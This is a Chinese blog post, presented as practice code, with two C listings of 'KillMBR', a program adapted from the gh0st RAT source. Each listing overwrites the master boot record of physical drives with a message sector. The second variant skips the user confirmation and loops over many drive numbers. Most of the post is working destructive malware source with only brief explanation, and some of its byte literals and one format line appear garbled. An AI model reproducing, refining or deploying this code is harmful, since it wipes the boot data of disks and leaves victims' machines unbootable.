  • 对硬盘扇区的操作,练手代码

    /*
    
    //KILLMBR.c
    源自gh0st远控3.6版的源码中对版权保护的硬盘锁,只做了少量修改
    通过这一篇文章了解 http://blog.csdn.net/qiurisuixiang/article/details/7314882 
    2013/7/11 by赫
    */
    #include "stdafx.h"
    /* Forward declaration; KillMBR() is defined after _tmain(). */
    int KillMBR() ;
    /*
     * Data that KillMBR() copies to the start of its 512-byte sector buffer.
     * According to the author's note under the listing, the part beginning at
     * "x49x20x61x6d" is the text shown on screen at the next boot.
     *
     * NOTE(review): the literals are kept exactly as this page prints them and
     * the rendering looks altered by extraction; do not derive byte-pattern
     * signatures from this listing without checking the original file.
     */
    unsigned char scode[] = 
    "xb8x12x00xcdx10xbdx18x7cxb9x18x00xb8x01x13xbbx0c" 
    "x00xbax1dx0excdx10xe2xfex49x20x61x6dx20x48x45x20" 
    "x46x75x63x6bx20x79x6fx75x0Dx3Cx3Cx3Cx2Bx3Ex3Ex3E"; 
    
    /*
     * Entry point of the first listing. Prints a warning banner, reads one wide
     * character from standard input and calls KillMBR() only when that character
     * is an upper-case 'Y'; any other input skips the call.
     *
     * The banner text (Chinese) says the program is highly dangerous, asks
     * whether to run it, and tells the user to enter capital Y to continue.
     *
     * Returns 0 when control reaches the end of the function. KillMBR() in this
     * listing calls ExitProcess() itself once it has opened the device, so the
     * code after the call runs only when the call was skipped or returned -1.
     */
    int _tmain(int argc, _TCHAR* argv[])
    {
        /* NOTE(review): "chs" is presumably the Simplified Chinese locale name,
           set so that the wide-character banner prints correctly; confirm. */
        _wsetlocale(LC_ALL, L"chs");
        wchar_t YesOrNo;
        wprintf(L"***********************************");
        wprintf(L"此程序有高度危险性是否要执行?
    ");
        wprintf(L"继续请输入Y(大写),输入其他退出
    ");
        wprintf(L"By赫");
        wprintf(L"***********************************");
        /* Single-character confirmation; only L'Y' proceeds. */
        YesOrNo = getwchar();
    
        if(YesOrNo == L'Y')
        {
            KillMBR();
        }
    
        /* Two further reads before returning; presumably to keep the console
           window open until the user presses a key. */
        getwchar();
    
        getwchar();
        return 0;
    }
     
    /*
     * Destructive routine: builds a 512-byte buffer (scode at the front, the
     * bytes 0x55 0xAA at offsets 510 and 511) and writes it to the
     * PHYSICALDRIVE0 device, then ends the process with ExitProcess(-1).
     * No seek is performed after the open, so the write goes to the start of
     * the device.
     *
     * Returns -1 when the device cannot be opened. The final `return 0` is not
     * reached because ExitProcess() is called before it. The results of the two
     * DeviceIoControl calls and of WriteFile are not examined, so the function
     * reports no failure other than a failed open.
     *
     * NOTE(review), defensive context: the observable behaviour is a user-mode
     * process opening a physical-drive device with GENERIC_WRITE and writing
     * one sector at the start of the disk. Opening a physical drive for writing
     * needs administrative rights on Windows, so running users without those
     * rights, alerting on raw-disk write handles from unexpected processes, and
     * keeping an offline backup that allows the boot sector to be restored are
     * the relevant controls. The author notes below the listing that antivirus
     * products already block this behaviour.
     */
    int KillMBR() 
    { 
        HANDLE hDevice; 
        DWORD dwBytesWritten, dwBytesReturned; 
        BYTE pMBR[512] = {0}; 
         
        // Rebuild the MBR image 
        memcpy(pMBR, scode, sizeof(scode) - 1); 
        pMBR[510] = 0x55; 
        pMBR[511] = 0xAA; 
         
        hDevice = CreateFile 
            ( 
            L"\\.\PHYSICALDRIVE0", 
            GENERIC_READ | GENERIC_WRITE, 
            FILE_SHARE_READ | FILE_SHARE_WRITE, 
            NULL, 
            OPEN_EXISTING, 
            0, 
            NULL 
            ); 
        if (hDevice == INVALID_HANDLE_VALUE) 
            return -1; 
        DeviceIoControl 
            ( 
            hDevice,  
            FSCTL_LOCK_VOLUME,  
            NULL,  
            0,  
            NULL,  
            0,  
            &dwBytesReturned,  
            NULL 
            ); 
        // Write the virus payload (the author's wording) 
        WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL); 
        DeviceIoControl 
            ( 
            hDevice,  
            FSCTL_UNLOCK_VOLUME,  
            NULL,  
            0,  
            NULL,  
            0,  
            &dwBytesReturned,  
            NULL 
            ); 
        CloseHandle(hDevice); 
     
        ExitProcess(-1); 
        return 0; 
    } 

          https://github.com/HeMinzhang/Hello-World/blob/master/windows/KillMBR/KillMBR.cpp 我的github

    unsigned char scode[] 的第 2 段从 “x49x20x61x6dx20x48x45x20” 开始,是程序成功运行后再次开机时在屏幕上显示的字符
     
    关键一点是CreateFile打开\\.\PHYSICALDRIVE0 为第一扇区,然后DeviceIoControl对设备执行操作,WriteFile写入到扇区,
    DeviceIoControl再次操作
     
    此类在运行时破坏 MBR 的程序,几年前就已被国内杀毒厂商拦截
     
    因为在win7下测试无效所以我改良了程序,如下      有效,只是显示字符不正确
    /*
    源自gh0st远控3.6版的源码中对版权保护的硬盘锁,只做了少量修改
    通过这一篇文章了解 http://blog.csdn.net/qiurisuixiang/article/details/7314882 
    2013/7/11 by赫
    */
    #include "stdafx.h"
    /* Forward declaration; KillMBR() is defined after _tmain(). */
    int KillMBR() ;
    
    /*
     * Data that KillMBR() copies to the start of its 512-byte sector buffer;
     * the same text as in the first listing on this page.
     *
     * NOTE(review): the literals are kept exactly as this page prints them and
     * the rendering looks altered by extraction; do not derive byte-pattern
     * signatures from this listing without checking the original file.
     */
    unsigned char scode[] = 
    "xb8x12x00xcdx10xbdx18x7cxb9x18x00xb8x01x13xbbx0c" 
    "x00xbax1dx0excdx10xe2xfex49x20x61x6dx20x48x45x20" 
    "x46x75x63x6bx20x79x6fx75x0Dx3Cx3Cx3Cx2Bx3Ex3Ex3E"; 
    
    /* Global drive number: updated by _tmain() and read by KillMBR() when it
       formats the device path. Starts at 10. */
    DWORD Sr = 10;
    /*
     * Entry point of the second listing. Unlike the first listing it asks for
     * no confirmation and never leaves its loop: every iteration calls
     * KillMBR(), which uses the global Sr as the physical-drive number.
     * Sr starts at 10, is stepped down to 0, is then set to 11 and counts
     * upward from there. The `return 0` after the loop is unreachable.
     *
     * NOTE(review), defensive context: a process that requests write access to
     * many physical-drive device names in a tight loop is a strong signal on
     * its own, independent of whether any single open succeeds.
     */
    int _tmain(int argc, _TCHAR* argv[])
    {
        while(1)
        {
            if(Sr == 0)
            {
                /* Downward count finished: switch to the upward range. */
                Sr = 11;
                KillMBR();
            }
            else if(Sr < 11)
            {
                /* Downward phase: decrement first, then call. */
                Sr--;
                KillMBR();
            }
            else
            {
                /* Upward phase: call first, then increment. */
                KillMBR();
                Sr++;
            }
        }
        return 0;
    }
     
    /*
     * Destructive routine, second variant: builds the same 512-byte buffer as
     * the first listing (scode at the front, 0x55 0xAA at offsets 510 and 511)
     * and writes it to the physical-drive device whose number is the global Sr.
     * No seek is performed after the open, so the write goes to the start of
     * the device.
     *
     * Differences from the first listing: the device path is formatted at run
     * time instead of being fixed to drive 0, and the ExitProcess() call is
     * commented out, so the function returns to its caller.
     *
     * Returns -1 when the device cannot be opened, otherwise 0. The results of
     * the two DeviceIoControl calls and of WriteFile are not examined.
     *
     * NOTE(review), defensive context: the observable behaviour is a user-mode
     * process opening physical-drive devices with GENERIC_WRITE and writing one
     * sector at the start of each. Opening a physical drive for writing needs
     * administrative rights on Windows, so running users without those rights,
     * alerting on raw-disk write handles from unexpected processes, and keeping
     * offline backups that allow boot sectors to be restored are the relevant
     * controls.
     */
    int KillMBR() 
    { 
        HANDLE hDevice; 
        DWORD dwBytesWritten, dwBytesReturned; 
        BYTE pMBR[512] = {0}; 
         
        wchar_t MBR_Path[128] ;
        // Rebuild the MBR image 
        memcpy(pMBR, scode, sizeof(scode) - 1); 
        pMBR[510] = 0x55; 
        pMBR[511] = 0xAA; 
         
        /* NOTE(review): this line is kept exactly as printed on the page and
           appears damaged by extraction (for example `_T('')`). */
        StringCchPrintf(MBR_Path,128,_T("\\.\PHYSICALDRIVE%d%c"),Sr,_T(''));
     
        hDevice = CreateFile 
            ( 
            MBR_Path, 
            GENERIC_READ | GENERIC_WRITE, 
            FILE_SHARE_READ | FILE_SHARE_WRITE, 
            NULL, 
            OPEN_EXISTING, 
            0, 
            NULL 
            ); 
        if (hDevice == INVALID_HANDLE_VALUE) 
            return -1; 
        DeviceIoControl 
            ( 
            hDevice,  
            FSCTL_LOCK_VOLUME,  
            NULL,  
            0,  
            NULL,  
            0,  
            &dwBytesReturned,  
            NULL 
            ); 
    
        // Write the virus payload (the author's wording) 
        WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL); 
        DeviceIoControl 
            ( 
            hDevice,  
            FSCTL_UNLOCK_VOLUME,  
            NULL,  
            0,  
            NULL,  
            0,  
            &dwBytesReturned,  
            NULL 
            ); 
        CloseHandle(hDevice); 
        //ExitProcess(-1); 
    
        return 0; 
    } 

    依次读取所有扇区然后Clean之

  • 原文地址:https://www.cnblogs.com/zero5/p/3185373.html